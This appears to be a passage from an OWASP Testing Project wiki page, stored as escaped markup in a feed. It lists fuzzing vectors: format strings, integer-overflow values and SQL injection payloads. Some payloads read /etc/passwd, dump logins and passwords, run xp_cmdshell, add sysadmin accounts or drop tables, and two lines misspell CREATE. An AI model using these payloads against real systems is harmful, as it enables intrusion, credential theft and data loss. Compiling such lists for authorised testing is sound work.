&amp;lt;nowiki&amp;gt;%99999999999s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%08x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20n&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s%s%s%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p%p%p%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Integer Overflows (INT) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;-1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x1000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x3fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7ffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x80000000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xfffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xffffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x10000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Passive SQL Injection (SQP) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;OR 1=1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR '1'='1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;; OR '1'='1'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1 /*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 'a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or &amp;quot;a&amp;quot;=&amp;quot;a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;') or ('a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;Admin' OR '&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' group by userid having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1 in (select @@version)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union all select @@version--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'unusual' = 'unusual'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' = 'some'+'thing'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' = N'text'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' like 'some%'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 &amp;gt; 1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' &amp;gt; 't'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'whatever' in ('whatever')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 BETWEEN 1 and 3&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or username like char(37);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select * from users where login = char(114,111,111,116);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select &lt;br /&gt;
&amp;lt;nowiki&amp;gt;Password:*/=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;UNI/**/ON SEL/**/ECT&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'/**/OR/**/1/**/=/**/1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1/*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;amp;password=&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &amp;gt; @var select @var as var into temp end --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1 in (select var from temp)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select 1,load_file('/etc/passwd'),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1=( if((load_file(char(110,46,101,120,116))&amp;lt;&amp;gt;char(39,39)),1,0));&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Active SQL Injection (SQI) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY 'pass123'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' ; drop table temp --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addlogin 'name' , 'password'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	</feed>